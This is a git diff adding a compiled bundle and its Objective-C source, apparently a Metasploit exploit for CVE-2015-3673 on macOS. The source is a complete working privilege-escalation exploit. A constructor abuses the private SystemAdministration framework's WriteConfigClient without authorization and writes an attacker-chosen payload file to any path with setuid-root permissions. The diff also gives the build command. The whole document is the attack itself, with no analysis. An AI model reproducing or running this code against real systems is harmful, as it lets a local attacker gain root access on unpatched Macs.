diff --git a/data/exploits/CVE-2015-3673/exploit.daplug b/data/exploits/CVE-2015-3673/exploit.daplug
new file mode 100755
index 0000000000..35671a5136
Binary files /dev/null and b/data/exploits/CVE-2015-3673/exploit.daplug differ
diff --git a/data/exploits/CVE-2015-3673/exploit.m b/data/exploits/CVE-2015-3673/exploit.m
new file mode 100644
index 0000000000..dc450487ba
--- /dev/null
+++ b/data/exploits/CVE-2015-3673/exploit.m
@@ -0,0 +1,31 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+    if (p != NULL)
+    {
+        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+        NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+                     data,
+                     outpath,
+                     @{ NSFilePosixPermissions : @04777 });
+    }
+}